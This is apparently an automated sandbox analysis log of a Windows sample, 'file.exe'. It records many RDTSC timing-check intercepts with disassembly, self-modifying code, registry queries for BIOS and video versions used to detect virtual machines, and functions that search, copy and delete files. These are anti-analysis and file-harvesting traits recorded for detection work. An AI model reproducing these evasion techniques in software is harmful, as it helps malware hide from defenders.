Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 130BF20 second address: 130BF40 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F849C4F2DA9h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pushad 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 130C1F8 second address: 130C1FC instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 130C1FC second address: 130C202 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 130C202 second address: 130C208 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 130C208 second address: 130C21F instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 jmp 00007F849C4F2D9Ch 0x0000000a popad 0x0000000b pushad 0x0000000c pushad 0x0000000d popad 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 130CED6 second address: 130CEDA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 130CEDA second address: 130CEE0 instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pop ecx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 130D5BF second address: 130D5E8 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F849CDA41FCh 0x00000007 push eax 0x00000008 push edx 0x00000009 jmp 00007F849CDA4209h 0x0000000e rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 13148C8 second address: 13148CE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 13148CE second address: 13148D6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pushad 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 13145EA second address: 13145EE instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 13145EE second address: 1314606 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 ja 00007F849CDA41F8h 0x0000000c push eax 0x0000000d pop eax 0x0000000e push eax 0x0000000f push edx 0x00000010 ja 00007F849CDA41F6h 0x00000016 push eax 0x00000017 push edx 0x00000018 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 1314606 second address: 131460A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 1320703 second address: 132070F instructions: 0x00000000 rdtsc 0x00000002 jo 00007F849CDA41FEh 0x00000008 pushad 0x00000009 popad 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 1323890 second address: 1323894 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 1323894 second address: 13238B8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F849CDA4209h 0x00000009 pop edx 0x0000000a pop eax 0x0000000b pushad 0x0000000c push ecx 0x0000000d pop ecx 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 13238B8 second address: 13238CE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F849C4F2DA1h 0x00000009 popad 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 13238CE second address: 13238D7 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push edi 0x00000004 pop edi 0x00000005 pushad 0x00000006 popad 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 132343C second address: 1323440 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 1323440 second address: 132345D instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F849CDA4200h 0x00000007 jnc 00007F849CDA41F6h 0x0000000d pop edx 0x0000000e pop eax 0x0000000f pushad 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 1257A12 second address: 1257A16 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 1257A16 second address: 1257A20 instructions: 0x00000000 rdtsc 0x00000002 js 00007F849CDA41F6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 1334349 second address: 133434F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edx 0x00000005 pop edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 133434F second address: 133438A instructions: 0x00000000 rdtsc 0x00000002 jnc 00007F849CDA41F6h 0x00000008 js 00007F849CDA41F6h 0x0000000e pop edx 0x0000000f pop eax 0x00000010 pushad 0x00000011 jg 00007F849CDA41F6h 0x00000017 jns 00007F849CDA41F6h 0x0000001d jmp 00007F849CDA4207h 0x00000022 jno 00007F849CDA41F6h 0x00000028 popad 0x00000029 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 125FE54 second address: 125FE5E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jc 00007F849C4F2D96h 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 1337BB5 second address: 1337BC5 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jmp 00007F849CDA41FAh 0x0000000b rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 1337BC5 second address: 1337BCB instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 1337BCB second address: 1337BD1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ebx 0x00000005 pop ebx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 1337BD1 second address: 1337BE4 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pushad 0x0000000b push eax 0x0000000c push edx 0x0000000d jno 00007F849C4F2D96h 0x00000013 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 1337BE4 second address: 1337C18 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 jmp 00007F849CDA4203h 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push eax 0x0000000c push edx 0x0000000d jmp 00007F849CDA4209h 0x00000012 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 124D580 second address: 124D58A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jng 00007F849C4F2D96h 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 124D58A second address: 124D598 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jng 00007F849CDA41FCh 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 133A160 second address: 133A19D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F849C4F2D9Bh 0x00000009 push eax 0x0000000a jmp 00007F849C4F2DA1h 0x0000000f pop eax 0x00000010 push ebx 0x00000011 jmp 00007F849C4F2DA8h 0x00000016 push eax 0x00000017 push edx 0x00000018 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 1340CAE second address: 1340CB2 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 133F40D second address: 133F418 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jp 00007F849C4F2D96h 0x0000000a popad 0x0000000b rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 133F418 second address: 133F41D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 133F93F second address: 133F945 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 133FA82 second address: 133FA8C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 push esi 0x00000007 pop esi 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 133FA8C second address: 133FA9B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 push esi 0x00000008 pop esi 0x00000009 jne 00007F849C4F2D96h 0x0000000f rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 133FA9B second address: 133FA9F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 133FD5A second address: 133FD6C instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 ja 00007F849C4F2D9Ch 0x0000000c rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 133FD6C second address: 133FD7D instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F849CDA41FCh 0x00000007 pushad 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 133FECF second address: 133FED3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 1344365 second address: 134436D instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push eax 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 134436D second address: 1344372 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 1344372 second address: 1344378 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 134C0D8 second address: 134C0DC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 134C0DC second address: 134C0E6 instructions: 0x00000000 rdtsc 0x00000002 jnp 00007F849CDA41F6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 134C0E6 second address: 134C0EC instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 134D82C second address: 134D830 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 134D830 second address: 134D870 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F849C4F2DA6h 0x00000007 jmp 00007F849C4F2D9Bh 0x0000000c pop edx 0x0000000d pop eax 0x0000000e push edi 0x0000000f jmp 00007F849C4F2D9Dh 0x00000014 pop edi 0x00000015 popad 0x00000016 push eax 0x00000017 push edx 0x00000018 push eax 0x00000019 pushad 0x0000001a popad 0x0000001b pop eax 0x0000001c pushad 0x0000001d push eax 0x0000001e pop eax 0x0000001f push eax 0x00000020 push edx 0x00000021 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 134D870 second address: 134D894 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jg 00007F849CDA41F6h 0x0000000a jmp 00007F849CDA4209h 0x0000000f popad 0x00000010 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 13567D5 second address: 13567E5 instructions: 0x00000000 rdtsc 0x00000002 jnc 00007F849C4F2D96h 0x00000008 jl 00007F849C4F2D96h 0x0000000e pop edx 0x0000000f pop eax 0x00000010 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 1365440 second address: 1365444 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 1375E81 second address: 1375E87 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 1375E87 second address: 1375E8B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 1374D85 second address: 1374D8A instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 1375050 second address: 1375055 instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 1375055 second address: 137505B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 137505B second address: 1375071 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop edx 0x00000006 pop eax 0x00000007 push esi 0x00000008 jl 00007F849CDA41FAh 0x0000000e push eax 0x0000000f pop eax 0x00000010 push ecx 0x00000011 pop ecx 0x00000012 push eax 0x00000013 push edx 0x00000014 push eax 0x00000015 push edx 0x00000016 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 1375071 second address: 1375077 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 1375077 second address: 137507B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 13751DC second address: 13751F2 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pop edi 0x00000004 jc 00007F849C4F2D96h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c jmp 00007F849C4F2D9Ah 0x00000011 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 1375349 second address: 1375364 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F849CDA4204h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push ecx 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 1375364 second address: 1375382 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ecx 0x00000005 popad 0x00000006 push ebx 0x00000007 push esi 0x00000008 jmp 00007F849C4F2DA2h 0x0000000d pop esi 0x0000000e push ecx 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 13758CF second address: 13758D9 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jns 00007F849CDA41F6h 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 1375A09 second address: 1375A0E instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 1375A0E second address: 1375A29 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop esi 0x00000005 jmp 00007F849CDA4200h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push edi 0x0000000d push ebx 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 1375B8C second address: 1375BA5 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F849C4F2DA5h 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 13789D2 second address: 13789F4 instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pop ecx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push eax 0x00000008 push edx 0x00000009 pushad 0x0000000a jmp 00007F849CDA4206h 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 13789F4 second address: 13789F9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 1378A86 second address: 1378A8A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 1378A8A second address: 1378AB3 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pop edi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop ecx 0x00000007 push eax 0x00000008 js 00007F849C4F2DBBh 0x0000000e push eax 0x0000000f push edx 0x00000010 jmp 00007F849C4F2DA9h 0x00000015 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 1378AB3 second address: 1378AB7 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 137A08B second address: 137A099 instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pushad 0x00000004 popad 0x00000005 pop edx 0x00000006 push eax 0x00000007 push edx 0x00000008 je 00007F849C4F2D96h 0x0000000e rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 137B8F2 second address: 137B930 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 jmp 00007F849CDA4207h 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push ecx 0x0000000c jbe 00007F849CDA41F6h 0x00000012 jmp 00007F849CDA4205h 0x00000017 pop ecx 0x00000018 push eax 0x00000019 push edx 0x0000001a push eax 0x0000001b push edx 0x0000001c rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 137B930 second address: 137B934 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 137D94B second address: 137D965 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F849CDA4206h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 137D965 second address: 137D98C instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 push edi 0x00000004 pop edi 0x00000005 jnc 00007F849C4F2D96h 0x0000000b pop esi 0x0000000c jmp 00007F849C4F2D9Fh 0x00000011 pop edx 0x00000012 pop eax 0x00000013 pushad 0x00000014 pushad 0x00000015 jp 00007F849C4F2D96h 0x0000001b push eax 0x0000001c push edx 0x0000001d rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 137D98C second address: 137D995 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 137D995 second address: 137D99B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 137D99B second address: 137D99F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 513028A second address: 51302E7 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F849C4F2DA9h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov dword ptr [esp], ebp 0x0000000c jmp 00007F849C4F2D9Eh 0x00000011 mov ebp, esp 0x00000013 pushad 0x00000014 call 00007F849C4F2D9Dh 0x00000019 mov bx, cx 0x0000001c pop ecx 0x0000001d popad 0x0000001e pop ebp 0x0000001f push eax 0x00000020 push edx 0x00000021 push eax 0x00000022 push edx 0x00000023 jmp 00007F849C4F2DA5h 0x00000028 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 51302E7 second address: 51302EB instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 51302EB second address: 51302F1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 5130317 second address: 513031D instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 513031D second address: 5130354 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007F849C4F2D9Ch 0x00000008 call 00007F849C4F2DA2h 0x0000000d pop ecx 0x0000000e popad 0x0000000f pop edx 0x00000010 pop eax 0x00000011 push ecx 0x00000012 pushad 0x00000013 jmp 00007F849C4F2D9Ch 0x00000018 push eax 0x00000019 push edx 0x0000001a push eax 0x0000001b push edx 0x0000001c rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 5130354 second address: 5130358 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 5130358 second address: 513038A instructions: 0x00000000 rdtsc 0x00000002 mov si, 3CADh 0x00000006 pop edx 0x00000007 pop eax 0x00000008 popad 0x00000009 mov dword ptr [esp], ebp 0x0000000c jmp 00007F849C4F2DA8h 0x00000011 mov ebp, esp 0x00000013 push eax 0x00000014 push edx 0x00000015 pushad 0x00000016 mov edx, 08CC7090h 0x0000001b mov cx, di 0x0000001e popad 0x0000001f rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 129F080 second address: 129F087 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push esi 0x00000005 pop esi 0x00000006 popad 0x00000007 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 129F087 second address: 129F091 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jbe 00007F849C4F2D96h 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe | Special instruction interceptor: First address: 10F1BF1 instructions caused by: Self-modifying code
Source: C:\Users\user\Desktop\file.exe | Special instruction interceptor: First address: 12933CE instructions caused by: Self-modifying code
Source: C:\Users\user\Desktop\file.exe | Special instruction interceptor: First address: 1291903 instructions caused by: Self-modifying code
Source: C:\Users\user\Desktop\file.exe | Special instruction interceptor: First address: 10EF29A instructions caused by: Self-modifying code
Source: C:\Users\user\Desktop\file.exe | Special instruction interceptor: First address: 1316D73 instructions caused by: Self-modifying code
Source: C:\Users\user\Desktop\file.exe | Registry key queried: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4d36e968-e325-11ce-bfc1-08002be10318}\0000 name: DriverDesc
Source: C:\Users\user\Desktop\file.exe | Registry key queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System name: SystemBiosVersion
Source: C:\Users\user\Desktop\file.exe | Registry key queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System name: VideoBiosVersion
Source: all processes | Thread injection, dropped files, key value created, disk infection and DNS query: no activity detected
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00EA38B0 wsprintfA,FindFirstFileA,lstrcat,StrCmpCA,StrCmpCA,wsprintfA,PathMatchSpecA,CoInitialize,CoUninitialize,lstrcat,lstrlen,StrCmpCA,wsprintfA,wsprintfA,PathMatchSpecA,wsprintfA,CopyFileA,__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z,DeleteFileA,FindNextFileA,FindClose,0_2_00EA38B0
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00EA4910 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,wsprintfA,StrCmpCA,wsprintfA,wsprintfA,PathMatchSpecA,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,CopyFileA,DeleteFileA,FindNextFileA,FindClose,0_2_00EA4910
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00E9DA80 FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,FindNextFileA,FindClose,0_2_00E9DA80
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00E9E430 FindFirstFileA,StrCmpCA,StrCmpCA,FindNextFileA,0_2_00E9E430
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00EA4570 GetProcessHeap,RtlAllocateHeap,wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,wsprintfA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,lstrcat,lstrcat,lstrlen,lstrlen,0_2_00EA4570
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00E9ED20 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,lstrlen,DeleteFileA,CopyFileA,FindNextFileA,FindClose,0_2_00E9ED20
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00E916D0 FindFirstFileA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,0_2_00E916D0
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00EA3EA0 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,FindNextFileA,FindClose,0_2_00EA3EA0
